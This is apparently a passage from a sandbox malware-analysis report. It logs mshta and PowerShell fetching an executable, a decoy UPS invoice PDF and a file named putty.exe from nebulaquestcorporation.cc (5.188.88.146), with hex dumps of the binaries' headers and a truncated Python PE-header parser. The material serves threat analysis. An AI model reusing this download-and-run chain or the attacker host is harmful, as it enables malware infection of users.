                    Jul 2, 2024 12:47:28.333070993 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.333127975 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.333141088 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.333225012 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.333515882 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.333532095 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.333621979 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.333631039 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.333659887 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.363325119 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.363362074 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.363455057 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.363455057 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.363465071 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.363864899 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.363884926 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.363948107 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.363948107 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.363956928 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.364639044 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.364664078 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.364734888 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.364744902 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.364764929 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.365174055 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.365190983 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.365236044 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.365243912 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.365253925 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.365535021 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.365557909 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.365598917 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.365607977 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.365653992 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.393852949 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.393873930 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.393980026 CEST49710443192.168.2.85.188.88.146
                    Jul 2, 2024 12:47:28.393994093 CEST443497105.188.88.146192.168.2.8
                    Jul 2, 2024 12:47:28.421747923 CEST443497105.188.88.146192.168.2.8
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jul 2, 2024 12:47:20.080583096 CEST | 59193 | 53 | 192.168.2.8 | 1.1.1.1
                    Jul 2, 2024 12:47:20.429162025 CEST | 53 | 59193 | 1.1.1.1 | 192.168.2.8
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Jul 2, 2024 12:47:20.080583096 CEST | 192.168.2.8 | 1.1.1.1 | 0x3865 | Standard query (0) | nebulaquestcorporation.cc | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Jul 2, 2024 12:47:20.429162025 CEST | 1.1.1.1 | 192.168.2.8 | 0x3865 | No error (0) | nebulaquestcorporation.cc | | 5.188.88.146 | A (IP address) | IN (0x0001) | false
                    • nebulaquestcorporation.cc
                    • armmf.adobe.com
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.8 | 49705 | 5.188.88.146 | 443 | 4996 | C:\Windows\System32\mshta.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-02 10:47:21 UTC | 351 | OUT | GET /cdnusa/invoiceupsstage HTTP/1.1
                    Accept: */*
                    Accept-Language: en-CH
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: nebulaquestcorporation.cc
                    Connection: Keep-Alive
                    2024-07-02 10:47:22 UTC | 211 | IN | HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 02 Jul 2024 10:47:21 GMT
                    Content-Length: 200872
                    Connection: close
                    Last-Modified: Wed, 12 Jun 2024 12:19:07 GMT
                    ETag: "310a8-61ab0638cc4c0"
                    Accept-Ranges: bytes
                    2024-07-02 10:47:22 UTC | 16173 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 92 a2 1d f1 f3 cc 4e f1 f3 cc 4e f1 f3 cc 4e e5 98 c9 4f f0 f3 cc 4e e5 98 cf 4f f3 f3 cc 4e e5 98 c8 4f e5 f3 cc 4e e5 98 cd 4f f8 f3 cc 4e f1 f3 cd 4e c4 f3 cc 4e e5 98 c5 4f f2 f3 cc 4e e5 98 33 4e f0 f3 cc 4e e5 98 ce 4f f0 f3 cc 4e 52 69 63 68 f1 f3 cc 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 4a 8a 5c 2d 00 00 00 00 00 00 00 00 e0 00 02
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NNNONONONONNNON3NNONRichNPELJ\-


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.8 | 49708 | 5.188.88.146 | 443 | 4620 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-02 10:47:25 UTC | 96 | OUT | GET /cdnusa/upsinvoice.pdf HTTP/1.1
                    Host: nebulaquestcorporation.cc
                    Connection: Keep-Alive
                    2024-07-02 10:47:25 UTC | 310 | IN | HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 02 Jul 2024 10:47:25 GMT
                    Content-Type: application/pdf
                    Content-Length: 93556
                    Last-Modified: Wed, 12 Jun 2024 12:17:52 GMT
                    Connection: close
                    ETag: "666991f0-16d74"
                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                    Cache-Control: max-age=315360000
                    Accept-Ranges: bytes
                    2024-07-02 10:47:25 UTC | 16074 | IN | Data Raw: 25 50 44 46 2d 31 2e 35 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 55 53 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 33 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 31 2f 4b 69 64 73 5b 20 33 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20 32 20 30 20 52 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 46 6f 6e 74 3c 3c 2f 46 31 20 35 20 30 20 52 2f 46 32 20 38 20 30 20 52 2f 46 33
                    Data Ascii: %PDF-1.5%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 13 0 R/MarkInfo<</Marked true>>>>endobj2 0 obj<</Type/Pages/Count 1/Kids[ 3 0 R] >>endobj3 0 obj<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 8 0 R/F3
                    2024-07-02 10:47:26 UTC16384INData Raw: bf 05 fd 6c f0 e7 81 7b 81 ef 40 ff a2 5a 42 9a 0e f3 bf 11 7f 9d e3 d6 68 31 bf 47 7c 0b cb 0d c5 e6 5a c2 b3 2a 45 82 31 8d 75 94 8b e6 f9 84 ff c5 68 38 2f 25 84 a6 5c d8 49 03 a6 e3 59 1d b8 0c d8 5d bd 85 bb cf 11 ff 01 a3 f1 34 f8 1a e0 61 e0 cb 6a 11 cf 91 e5 22 70 3b b0 0a 58 01 6c 62 ec d0 83 de 35 44 cc 20 34 5f b2 f0 6f a8 14 83 1f 09 ec 2c b1 0a 58 01 e4 67 bb 43 73 1f ee 6e 81 e4 24 24 65 90 ac 13 f3 ce 3c e1 76 60 15 b0 02 d8 04 64 fd b1 d0 9c 8b a7 14 81 e6 57 38 2a c0 bf 8c 9e 6f 04 5f 0d dc 28 25 55 c0 0a 60 13 30 9f c6 b2 c7 5c 81 28 f2 33 e2 ed 27 80 57 f0 ec 32 89 db 81 55 c0 0a 20 5b 58 06 6f fc 9c 75 4c ab 80 3f 47 9f af 00 eb 61 a7 9e fb 6c b8 68 3e 44 78 15 78 d1 fc 1a 30 02 9c 06 44 24 98 1b c9 42 77 cc d7 75 68 d6 03 2f 48 9c 8f
                    Data Ascii: l{@ZBh1G|Z*E1uh8/%\IY]4aj"p;Xlb5D 4_o,XgCsn$$e<v`dW8*o_(%U`0\(3'W2U [XouL?Galh>Dxx0D$Bwuh/H
                    2024-07-02 10:47:26 UTC11946INData Raw: 8e e6 24 9c 02 c7 b0 b5 ec 07 f6 23 fb 89 fd cc d6 b1 f5 52 0c 7b d2 59 d2 d9 d2 39 d2 5c e9 5c e9 3c e9 7c e9 02 e9 42 e9 4e 69 b1 b4 44 ba 4b ba 5b ba 47 ba 57 5a 2a dd 27 bd 22 bd 26 bd 21 bd 29 bd 2d bd 2b fd 5d fa 40 fa 48 fa 44 fa 4c fa 42 fa 4a a6 20 63 64 8a 32 56 26 95 c9 64 4a 32 4e a6 2c b3 92 59 cb 6c 64 b6 32 3b 19 2f 93 cb ec 65 0e 32 47 99 93 cc 59 e6 22 73 95 b9 c9 dc 65 1e b2 96 b2 56 32 4f 59 6b 59 1b 99 97 cc 5b e6 23 f3 95 f9 71 32 4e 89 e3 38 35 4e 9d d3 e0 de 73 b5 dc 07 4e 8f d3 e7 84 79 50 33 12 79 22 12 6d d2 98 75 75 c0 3e 2d 81 4a c4 cc 21 0d 47 95 32 6a 14 8e 2a 95 c8 ba 59 8e c4 90 ca 24 32 54 21 e3 bf aa a2 2d a2 2d 48 4d b2 49 b2 19 a9 4b 8a 25 c5 48 53 f2 4e f2 0e 73 46 1c 2f 21 2d 21 5e c2 dc ea 06 7b 0f 59 08 51 13 66 52
                    Data Ascii: $#R{Y9\\<|BNiDK[GWZ*'"&!)-+]@HDLBJ cd2V&dJ2N,Yld2;/e2GY"seV2OYkY[#q2N85NsNyP3y"muu>-J!G2j*Y$2T!--HMIK%HSNsF/!-!^{YQfR


                    Session ID: 2
                    Source IP: 192.168.2.8
                    Source Port: 49710
                    Destination IP: 5.188.88.146
                    Destination Port: 443
                    PID: 4620
                    Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Timestamp, Bytes transferred, Direction: Data
                    2024-07-02 10:47:27 UTC, 67 bytes, OUT: GET /cdnusa/putty.exe HTTP/1.1
                    Host: nebulaquestcorporation.cc
                    2024-07-02 10:47:27 UTC, 322 bytes, IN: HTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 02 Jul 2024 10:47:27 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1663264
                    Last-Modified: Mon, 20 May 2024 14:16:58 GMT
                    Connection: close
                    ETag: "664b5b5a-196120"
                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                    Cache-Control: max-age=315360000
                    Accept-Ranges: bytes
                    2024-07-02 10:47:27 UTC16062INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 bf 1a 11 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 82 0e 00 00 84 0a 00 00 00 00 00 04 af 0b 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 19 00 00 04 00 00 71 20 1a 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdf"@q `
                    2024-07-02 10:47:27 UTC16384INData Raw: f1 e8 8c 47 01 00 01 c5 48 8d 84 24 a0 00 00 00 29 c5 e9 3a f6 ff ff 0f 1f 00 4f ec ff ff 72 c8 ff ff ef ce ff ff ae d3 ff ff 3f ce ff ff ae d3 ff ff 10 cf ff ff c4 cf ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ff d0 ff ff 58 d0 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff 1d d0 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae
                    Data Ascii: GH$):Or?X
                    2024-07-02 10:47:27 UTC16384INData Raw: 1f 00 48 83 c6 01 48 81 fe 06 01 00 00 74 33 83 bc b4 30 01 00 00 00 74 e9 48 8b 05 1a 40 12 00 0f b6 4c b0 06 44 0f b6 4c b0 05 44 0f b6 44 b0 04 89 4c 24 20 4c 89 e1 48 89 fa e8 b2 a4 03 00 eb c0 48 85 ed 74 4f 48 89 e9 31 d2 e8 61 c7 03 00 48 85 c0 74 40 bf 01 00 00 00 48 8d 1d 92 94 10 00 8b 40 04 0f b6 f4 44 0f b6 c0 c1 e8 10 0f b6 c0 89 44 24 20 4c 89 e1 48 89 da 41 89 f1 e8 6e a4 03 00 48 89 e9 89 fa e8 24 c7 03 00 83 c7 01 48 85 c0 75 cc 48 89 6c 24 58 48 8d 05 ad b4 0f 00 48 89 84 24 08 01 00 00 48 c7 84 24 10 01 00 00 01 00 00 00 48 8d 94 24 08 01 00 00 4c 89 e1 e8 7c 9f 03 00 48 8b 7c 24 78 83 7c 24 54 00 0f 8e d8 05 00 00 83 bc 24 88 00 00 00 00 0f 8e ca 05 00 00 31 ed 0f 57 f6 45 31 ed c7 44 24 6c ff ff ff ff c7 44 24 68 ff ff ff ff c7 84 24
                    Data Ascii: HHt30tH@LDLDDL$ LHHtOH1aHt@H@DD$ LHAnH$HuHl$XHH$H$H$L|H|$x|$T$1WE1D$lD$h$
                    2024-07-02 10:47:27 UTC16384INData Raw: c1 48 83 c4 28 5f 5e e9 66 48 00 00 cc cc cc cc cc cc 41 57 41 56 41 55 41 54 56 57 55 53 b8 48 10 00 00 e8 aa de 0a 00 48 29 c4 48 89 d7 48 89 ce 48 8b 05 5a e5 11 00 48 31 e0 48 89 84 24 40 10 00 00 8b 1d 11 d7 0d 00 89 d9 e8 a2 a3 02 00 89 d9 e8 0b a4 02 00 48 89 c3 31 c9 e8 a1 a3 02 00 48 85 db 74 0b 8b 8b a4 00 00 00 e8 91 a3 02 00 48 89 f1 ba 83 00 00 00 45 31 c0 e8 41 50 03 00 31 c9 48 89 f2 e8 27 c5 02 00 48 89 f9 e8 2f a1 ff ff 48 89 c3 48 89 c1 48 89 f2 e8 91 a1 ff ff 84 c0 74 1f 48 89 f1 e8 65 5a 03 00 84 c0 75 22 48 89 f1 e8 d9 5e 01 00 84 c0 75 16 31 c9 e8 4e a0 ff ff 48 89 d9 48 89 f2 e8 13 a2 ff ff 84 c0 74 1b 48 89 f1 e8 c7 a1 02 00 48 83 3d af 07 12 00 00 0f 85 9d 02 00 00 e9 c6 02 00 00 80 3b 00 74 3b 31 db 48 8d 54 24 3c 4c 8d 44 24 30
                    Data Ascii: H(_^fHAWAVAUATVWUSHH)HHHZH1H$@H1HtHE1AP1H'H/HHHtHeZu"H^u1NHHtHH=;t;1HT$<LD$0
                    2024-07-02 10:47:27 UTC16384INData Raw: 08 12 00 00 00 0f 11 b6 74 21 00 00 c6 86 84 21 00 00 00 e8 3a eb 00 00 48 89 86 10 12 00 00 48 89 f1 31 d2 e8 19 00 00 00 48 89 f0 0f 28 74 24 20 48 83 c4 38 5b 5f 5e 41 5e c3 cc cc cc cc cc cc cc 41 56 56 57 55 53 48 81 ec 40 01 00 00 66 44 0f 7f bc 24 30 01 00 00 44 0f 29 b4 24 20 01 00 00 66 44 0f 7f ac 24 10 01 00 00 66 44 0f 7f a4 24 00 01 00 00 44 0f 29 9c 24 f0 00 00 00 66 44 0f 7f 94 24 e0 00 00 00 66 44 0f 7f 8c 24 d0 00 00 00 44 0f 29 84 24 c0 00 00 00 0f 29 bc 24 b0 00 00 00 0f 29 b4 24 a0 00 00 00 41 89 d6 48 89 ce 48 81 c1 2a 15 00 00 41 b8 06 01 00 00 b2 01 e8 8c b7 0a 00 48 8d 1d 45 97 0d 00 31 ff 0f 1f 00 48 63 2b 48 8b 8e e8 10 00 00 ba 96 00 00 00 41 89 f8 e8 79 08 03 00 48 8d 6c 6d 00 88 84 2e 18 12 00 00 48 8b 8e e8 10 00 00 44 8d 47
                    Data Ascii: t!!:HH1H(t$ H8[_^A^AVVWUSH@fD$0D)$ fD$fD$D)$fD$fD$D)$)$)$AHH*AHE1Hc+HAyHlm.HDG
                    2024-07-02 10:47:27 UTC16384INData Raw: 54 24 47 48 8d a9 a0 00 00 00 4c 8d a1 20 01 00 00 48 8d 81 78 0e 00 00 48 89 44 24 30 48 8d 81 0c 01 00 00 48 89 84 24 a0 00 00 00 48 8d 81 88 0e 00 00 48 89 44 24 68 48 8d 41 40 48 89 84 24 98 00 00 00 48 8d 81 8c 00 00 00 48 89 44 24 58 48 8d 41 60 48 89 44 24 38 48 8d 41 78 48 89 44 24 60 4c 8d b1 6a 0a 00 00 0f 57 f6 31 f6 31 ff 31 c0 48 89 84 24 80 00 00 00 eb 11 66 0f 1f 44 00 00 41 c7 87 1c 01 00 00 00 00 00 00 41 bd ff ff ff ff 48 39 f7 72 17 41 83 fd ff 75 11 48 89 e9 e8 ac ff 01 00 48 85 c0 0f 84 f5 36 00 00 41 83 fd ff 74 0d 44 89 ac 24 ac 00 00 00 e9 b0 00 00 00 41 83 bf a8 21 00 00 00 0f 85 d4 36 00 00 48 39 f7 75 5b 48 89 e9 48 89 f2 e8 12 5a 03 00 48 89 e9 e8 6a ff 01 00 48 85 c0 0f 84 b1 36 00 00 48 8d 8c 24 b0 00 00 00 48 89 ea e8 c1 5a
                    Data Ascii: T$GHL HxHD$0HH$HHD$hHA@H$HHD$XHA`HD$8HAxHD$`LjW111H$fDAAH9rAuHH6AtD$A!6H9u[HHZHjH6H$HZ
                    2024-07-02 10:47:27 UTC16384INData Raw: ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 28 e3 ff ff 9a e3 ff ff 58 ed ff ff 58 ed ff ff 1e e4 ff ff c8
                    Data Ascii: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX(XX
                    2024-07-02 10:47:27 UTC16384INData Raw: 8d 00 00 00 80 7e 20 00 0f 84 13 01 00 00 41 83 fc 01 0f 85 2c 01 00 00 41 f7 c7 00 00 40 00 75 19 48 8d 0d aa 11 10 00 48 8d 15 e5 e8 0f 00 41 b8 87 17 00 00 e8 b4 ed 0a 00 c7 44 24 4c 20 00 20 00 0f b7 06 8b 53 7c 48 8b 8b c8 10 00 00 48 8b ab 80 00 00 00 48 8b 31 48 89 6c 24 38 89 44 24 30 89 54 24 28 c7 44 24 20 02 00 00 00 4c 8d 4c 24 4c 44 89 ea 45 89 f0 ff 56 08 48 8b 8b c8 10 00 00 48 8b 01 44 89 ea 45 89 f0 ff 50 18 eb 71 48 8b 94 24 d8 00 00 00 0f b7 06 48 8b 8b c8 10 00 00 48 8b 39 48 89 54 24 38 89 44 24 30 44 89 7c 24 28 44 89 64 24 20 44 89 ea 45 89 f0 49 89 e9 ff 57 08 41 f7 c7 00 00 00 60 74 34 0f b7 06 48 8b 8b c8 10 00 00 48 8b 19 48 8b 94 24 d8 00 00 00 48 89 54 24 38 89 44 24 30 44 89 7c 24 28 44 89 64 24 20 44 89 ea 45 89 f0 49 89 e9
                    Data Ascii: ~ A,A@uHHAD$L S|HHH1Hl$8D$0T$(D$ LL$LDEVHHDEPqH$HH9HT$8D$0D|$(Dd$ DEIWA`t4HHH$HT$8D$0D|$(Dd$ DEI
                    2024-07-02 10:47:27 UTC16384INData Raw: 19 90 41 0f b6 8f 78 04 00 00 49 8b 6f 18 88 4c 05 ff 40 b5 01 48 85 db 74 4a 48 89 d8 48 83 c3 ff 49 8b 4f 10 8b 4c 81 fc bf 01 00 00 00 d3 e7 0f a3 ca 72 cd 40 f6 c5 01 74 da f7 c7 08 0d 20 00 74 12 41 0f b6 8f 78 04 00 00 49 8b 7f 18 88 4c 07 ff eb c0 81 e7 c6 02 04 00 40 0f b6 ed 0f 44 ef eb b1 4d 8b 03 4d 85 c0 0f 84 2a 04 00 00 49 8b 47 10 8b 00 b9 c6 02 04 00 0f a3 c1 73 11 49 8b 47 18 41 8a 8f 78 04 00 00 88 08 4d 8b 47 50 49 83 f8 02 72 42 b8 01 00 00 00 b9 c6 02 04 00 eb 18 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 83 c0 01 4c 39 c0 73 1e 49 8b 57 10 8b 14 82 0f a3 d1 73 eb 49 8b 57 18 0f b6 5c 02 ff 88 1c 02 4d 8b 47 50 eb d9 4d 85 c0 0f 84 b8 03 00 00 31 c9 48 8d 15 87 e3 0c 00 eb 14 0f 1f 44 00 00 41 89 28 4d 8b 03 48 83 c1 01 4c 39 c1
                    Data Ascii: AxIoL@HtJHHIOLr@t tAxIL@DMM*IGsIGAxMGPIrBf.DHL9sIWsIW\MGPM1HDA(MHL9
                    2024-07-02 10:47:27 UTC16384INData Raw: 8b 84 24 a0 00 00 00 48 8b 0d 84 65 10 00 48 31 e1 48 89 4c 24 58 41 83 f8 52 7f 29 41 83 f8 05 74 63 41 83 f8 10 0f 85 e0 00 00 00 48 89 f1 e8 6e 8a fe ff 31 ff 48 89 f1 31 d2 e8 02 03 03 00 e9 af 00 00 00 41 83 f8 53 0f 84 8c 00 00 00 41 81 f8 02 02 00 00 0f 85 b0 00 00 00 ff 15 28 0d 10 00 80 bf 10 01 00 00 00 0f 84 83 00 00 00 31 d2 83 bf 14 01 00 00 00 0f 95 c2 48 89 f1 e8 bf 02 03 00 eb 6d 49 83 f9 02 75 67 80 3d 60 88 10 00 00 75 5e c6 05 57 88 10 00 01 c7 44 24 28 2c 00 00 00 48 8d 54 24 28 48 89 f1 ff 15 d9 0b 10 00 85 c0 74 1d 83 7c 24 30 03 75 16 c7 44 24 30 01 00 00 00 48 8d 54 24 28 48 89 f1 ff 15 48 0d 10 00 c6 05 19 88 10 00 00 eb 17 44 8b 40 08 48 83 c7 08 48 89 f9 48 89 f2 e8 04 49 00 00 84 c0 74 64 31 ff 48 8b 4c 24 58 48 31 e1 e8 31 5e
                    Data Ascii: $HeH1HL$XAR)AtcAHn1H1ASA(1HmIug=`u^WD$(,HT$(Ht|$0uD$0HT$(HHD@HHHItd1HL$XH11^
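
The response body above begins with an MZ/PE header. As an added check (example code written for this page, not part of the Joe Sandbox report or of any tool it names), the following Python parses the first 255 bytes exactly as printed in the first "Data Raw" line of session 2 and pulls out the fields an analyst records first: machine type, section count, link timestamp, entry point, image base, subsystem and DLL characteristics. Only the standard library is used; the function and constant names are my own.

```python
import struct
from datetime import datetime, timezone

# The first 255 bytes of the putty.exe response body, copied from the first
# 'Data Raw' line of HTTP session 2 above. bytes.fromhex() skips whitespace,
# so the 16-byte rows are only there for reading.
PUTTY_HEAD_HEX = """
4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00
bf 1a 11 66 00 00 00 00 00 00 00 00 f0 00 22 00
0b 02 0e 00 00 82 0e 00 00 84 0a 00 00 00 00 00
04 af 0b 00 00 10 00 00 00 00 00 40 01 00 00 00
00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00
06 00 00 00 00 00 00 00 00 b0 19 00 00 04 00 00
71 20 1a 00 02 00 60 81 00 00 10 00 00 00 00 00
00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00
00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
"""

MACHINE_NAMES = {0x014C: "I386", 0x8664: "AMD64", 0xAA64: "ARM64"}
SUBSYSTEMS = {2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def parse_report_hex(hex_text):
    """Turn a Joe Sandbox 'Data Raw' hex dump into bytes."""
    return bytes.fromhex(hex_text)


def parse_pe_head(data):
    """Read the DOS header, the COFF header and the start of the PE32+ optional header.

    Needs only the first ~220 bytes, fewer than the report prints.
    Raises ValueError if the buffer is not a PE32+ image.
    """
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _symtab, _nsyms, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic != 0x20B:
        raise ValueError("expected PE32+ magic 0x20b, got 0x%x" % magic)
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    (image_base,) = struct.unpack_from("<Q", data, opt + 24)   # 8 bytes in PE32+
    (size_of_image,) = struct.unpack_from("<I", data, opt + 56)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
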